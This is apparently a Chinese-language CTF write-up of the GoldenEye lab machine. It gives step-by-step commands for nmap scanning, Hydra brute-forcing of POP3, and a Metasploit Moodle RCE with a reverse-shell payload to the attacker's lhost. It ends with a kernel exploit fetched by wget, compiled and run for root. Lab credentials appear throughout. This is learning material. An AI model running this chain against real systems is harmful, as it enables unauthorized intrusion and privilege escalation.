百个项目 :1-GoldenEye渗透学习

2024-04-22 903 0

百个项目 :1-GoldenEye

作者:摇光

时间:2024-04-05

座右铭:路虽远,行则将至,事虽难,做则必成。

请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一.信息收集

在VM中获取攻击目标的ip地址,用nmap获取目标主机的ip地址

百个项目 :1-GoldenEye渗透学习插图

我们已经找到目标主机的IP地址:192.168.111.133。192.168.111.1和192.168.111.2一般是本机的网关或适配器不必理会。

nmap扫描发现目标主机的端口及服务

百个项目 :1-GoldenEye渗透学习插图1

发现开放了25、80端口

访问http://192.168.111.133/

百个项目 :1-GoldenEye渗透学习插图2

显示的文本提示了一条线索,它说进入到/sev-home/目录中。 
User: UNKNOWN
Naviagate to /sev-home/ to login 
需要登录,开始枚举查找用户名密码信息!

在http://192.168.111.133/页面下查看源代码

百个项目 :1-GoldenEye渗透学习插图3

访问view-source:http://192.168.111.133/terminal.js

百个项目 :1-GoldenEye渗透学习插图4

获得密码:&amp#73;&amp#110;&amp#118;&amp#105;&amp#110;&amp#99;&amp#105;&amp#98;&amp#108;&amp#101;&amp#72;&amp#97;&amp#99;&amp#107;&amp#51;&amp#114;

其格式可知HTML加密,在burpsuit进行HTML解密:InvincibleHack3r

百个项目 :1-GoldenEye渗透学习插图5

二、web渗透

在http://192.168.111.133/sev-home/ 路径下用上述密码尝试登录,最终账号密码:boris/InvincibleHack3r

百个项目 :1-GoldenEye渗透学习插图6

登陆后,F12调试界面发现信息

百个项目 :1-GoldenEye渗透学习插图7

1)is very effective, we have configured our pop3 service to run on a very high non-default port
谷歌翻译:非常有效,我们已将 pop3 服务配置为在非常高的非默认端口上运行

从得到信息,可以了解到某个非默认端口上正在运行一个pop3的服务,进行nmap全端口扫描:nmap -p- 192.168.111.133 (-p-:全端口扫描   -p3306:仅仅扫描3306端口)

百个项目 :1-GoldenEye渗透学习插图8

发现55006,55007两个开放的端口,扫描其开启服务的详细信息:nmap -sS -sV -T5 -A -p55006,55007 192.168.111.133(sS -sV -T5 -A -p 这些参数在nmap命令中分别用于执行SYN扫描、探测服务版本、设置扫描速度模板为最快、启用操作系统检测和端口扫描)

百个项目 :1-GoldenEye渗透学习插图9

这段信息可以看出这连个端口开放了pop3的mail服务,通过view-source:http://192.168.111.133/terminal.js页面,在注释中发现//Boris, make sure you update your default password.指出目标系统正在使用默认密码。

Hydra(九头蛇)暴力破解pop3服务:

echo -e 'natalya\nboris' > sun.txt  ---将两个用户名写入txt文本中

hydra -L sun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.111.133 -s 55007 pop3百个项目 :1-GoldenEye渗透学习插图10

百个项目 :1-GoldenEye渗透学习插图11

爆出账号密码

login: natalya   password: bird

login: boris   password: secret1!

通过NC登录pop3查看邮件内容

邮件1

百个项目 :1-GoldenEye渗透学习插图12

邮件2

百个项目 :1-GoldenEye渗透学习插图13

邮件3

百个项目 :1-GoldenEye渗透学习插图14

第二封来自用户“natalya”,称她可以破坏鲍里斯的密码。
第三封邮件可以看出有一份文件用了GoldenEye的访问代码作为附件进行发送,并保留在根目录中。但我们无法从此处阅读附件。

natalya用户登录邮件查看信息:

邮件1

百个项目 :1-GoldenEye渗透学习插图15

百个项目 :1-GoldenEye渗透学习插图16

----------------------------------------------------------------------------------------
两封邮件:第一封邮件:
娜塔莉亚,请你停止破解鲍里斯的密码。 此外,您是 GNO 培训主管。 一旦学生被指定给你,我就会给你发电子邮件。
此外,请注意可能的网络漏洞。 我们获悉,一个名为 Janus 的犯罪集团正在追捕 GoldenEye。

第二封邮件:
好的 Natalyn 我有一个新学生给你。 由于这是一个新系统,如果您看到任何配置问题,请告诉我或鲍里斯,尤其是它与安全有关的问题……即使不是,也只需以“安全”为幌子输入……它就会 轻松升级变更单:)
好的,用户信用是:
用户名:xenia
密码:RCP90rulez!
鲍里斯验证了她是一个有效的承包商,所以只需创建帐户好吗?
如果您没有外部内部域的 URL:severnaya-station.com/gnocertdir
**请务必编辑您的主机文件,因为您通常在远程离线工作....
由于您是 Linux 用户,因此只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。
----------------------------------------------------------------------------------------

邮件2发现另一个用户名密码,以及服务器域名和网站,并让我们在本地服务hosts中添加域名信息

设置本地HOSTS文件

百个项目 :1-GoldenEye渗透学习插图17

百个项目 :1-GoldenEye渗透学习插图18

添加192.168.111.133 severnaya-station.com并保存

访问severnaya-station.com/gnocertdir地址:

百个项目 :1-GoldenEye渗透学习插图19

进入网页看到了moodle,这是一个开源CMS系统,随便点一点,发现需要登录,用获取到的用户名密码登录。

百个项目 :1-GoldenEye渗透学习插图20

发现有一封邮件,内容发现用户名doak

继续爆破用户名doak的邮件

获得用户名密码:doak/goat

使用NC登录doak用户枚举邮件信息

nc 192.168.4.202 55007     ---登录邮箱
user doak                  ---登录用户
pass goat                  ---登录密码
list                       ---查看邮件数量
retr 1                     ---查看邮件内容

百个项目 :1-GoldenEye渗透学习插图21

邮件内容:为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。
用户名:dr_doak
密码:4England!

使用新的账户密码登录CMS

百个项目 :1-GoldenEye渗透学习插图22

登录后在:Home / ▶ My home 右边发现: s3cret.txt
另外发现这是Moodle使用的2.2.3版本

查看文件的内容,指出管理员凭据已隐藏在映像文件中,让我们在浏览器中打开图像以查看其内容

百个项目 :1-GoldenEye渗透学习插图23

访问页面:severnaya-station.com/dir007key/for-007.jpg

百个项目 :1-GoldenEye渗透学习插图24

下载到本地:
wget http://severnaya-station.com/dir007key/for-007.jpg

百个项目 :1-GoldenEye渗透学习插图25

根据邮件提示让我们检查图片内容,下载图片后,我们可以使用:
binwalk(路由逆向分析工具)
exiftool(图虫)
strings(识别动态库版本指令)
等查看jpg文件底层内容!

strings for-007.jpg

百个项目 :1-GoldenEye渗透学习插图26

查看到base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ==

使用Burpsuite破解获得密码:xWinter1995x!

线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序。
用户名:admin
密码:xWinter1995x!

这是Moodle使用的2.2.3版本,谷歌搜索了网上的可用漏洞。

百个项目 :1-GoldenEye渗透学习插图27

Moodle 2.2.3 exp cve   --> CVE-2013-3630 漏洞可利用! 29324

百个项目 :1-GoldenEye渗透学习插图28

此版本有许多漏洞利用,由于我们需要在目标计算机上进行外壳访问,因此我选择使用远程代码执行(RCE)漏洞利用。

使用神器:MSF

msfconsole                        ---进入MSF框架攻击界面
search moodle                     ---查找 moodle类型 攻击的模块
use 0                             ---调用0  exploit/multi/http/moodle_cmd_exec调用攻击脚本
set username admin                ---设置用户名:admin
set password xWinter1995x!        ---设置密码:xWinter1995x!
set rhost severnaya-station.com   ---设置:rhosts severnaya-station.com
set targeturi /gnocertdir         ---设置目录: /gnocertdir
set payload cmd/unix/reverse      ---设置payload:cmd/unix/reverse
set lhost 192.168.4.231           ---设置:lhost 192.168.111.128(需要本地IP)

set vhost severnaya-station.com
run ----执行命令

百个项目 :1-GoldenEye渗透学习插图29

百个项目 :1-GoldenEye渗透学习插图30

百个项目 :1-GoldenEye渗透学习插图31

python -c 'import pty; pty.spawn("/bin/bash")'     ---将shell进行tty

百个项目 :1-GoldenEye渗透学习插图32

此时已经拿到服务器的powershell,接下来进行提权

提权一定要在tmp目录下才能进行操作,切换目录

百个项目 :1-GoldenEye渗透学习插图33

三、内核提权

uname -a 查看权限!

百个项目 :1-GoldenEye渗透学习插图34

谷歌搜索:Linux ubuntu 3.13.0-32 exploit
获得exp版本:37292

kali搜索下:
searchsploit 37292        ---搜索kali本地的exp库中37292攻击脚本信息
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/   ---目录自行修改

百个项目 :1-GoldenEye渗透学习插图35

百个项目 :1-GoldenEye渗透学习插图36

这个靶场在枚举信息知道:
无法进行GCC编译,需要改下脚本为cc
gedit 37292.c       ---文本打开 
第143行将gcc改为cc    ---编写下

百个项目 :1-GoldenEye渗透学习插图37

然后在本目录下开启http服务:python -m SimpleHTTPServer 8081

百个项目 :1-GoldenEye渗透学习插图38

wget http://192.168.111.133:8081/37292.c   ---wget下载http服务下的文件

百个项目 :1-GoldenEye渗透学习插图39

成功下载后执行cc编译:
cc -o exp 37292.c     ---C语言的CC代码编译点c文件
chmod +x exp          ---编译成可执行文件,并赋权
./exp                 ---点杠执行

id                   ---查看目前权限
cat /root/.flag.txt  ---读取root下的flag信息
568628e0d993b1973adc718237da6e93


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论